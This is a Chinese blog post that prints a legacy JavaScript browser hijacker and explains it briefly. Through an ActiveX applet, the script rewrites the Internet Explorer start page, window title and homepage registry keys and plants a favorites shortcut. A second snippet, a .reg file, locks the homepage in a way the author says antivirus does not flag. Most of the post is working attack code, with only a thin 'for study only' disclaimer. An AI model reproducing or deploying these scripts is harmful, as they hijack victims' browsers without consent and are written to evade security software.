这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下:
- <script>
- document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
- function AddFavLnk(loc, DispName, SiteURL)
- {
- var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
- Shor.TargetPath = SiteURL;
- Shor.Save();
- }
- function f(){
- try
- {
- //ActiveX 初始化
- a1=document.applets[0];
- a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
- a1.createInstance();
- Shl = a1.GetObject();
- a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
- a1.createInstance();
- FSO = a1.GetObject();
- a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
- a1.createInstance();
- Net = a1.GetObject();
- try
- {
- if (document.cookie.indexOf("Chg") == -1)
- {
- //设置Cookie
- var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
- document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
- //设置Cookie完毕
- //设置主页
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://sucre.javaeye.com/");
- //修改浏览器的标题
- Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "你的Internet Explorer已经被修改过了 By Sucre");
- //锁定浏览器首页
- Sh1.RegWrite("HKCR\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\@","'\"C:\\Program Files\\Internet Explorer\\IExplore.exe\"' http://sucre.javaeye.com");
- //设置Cookie
- var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
- document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
- var WF, Shor, loc;
- WF = FSO.GetSpecialFolder(0);
- loc = WF + "\\Favorites";
- if(!FSO.FolderExists(loc))
- {
- loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
- if(!FSO.FolderExists(loc))
- {
- return;
- }
- }
- AddFavLnk(loc, "我的博客", "http://sucre.blog.51cto.com");
- }
- }
- catch(e)
- {}
- }
- catch(e)
- {}
- }
- function init()
- {
- setTimeout("f()", 1000);
- }
- init();
- </script>
其实,用其它脚本也可以实现锁定主页,比如批处理,下面这段代码就锁住了主页,一开IE就会显示指定的页面,这种指向方法所有的防护软件都不会报警,代码如下:
- Windows Registry Editor Version 5.00
- [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
- @="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.blog.51cto.com"
以上文字仅供学习交流,不要用于非法操作,否则后果自负!
转载于:https://blog.51cto.com/sucre/380581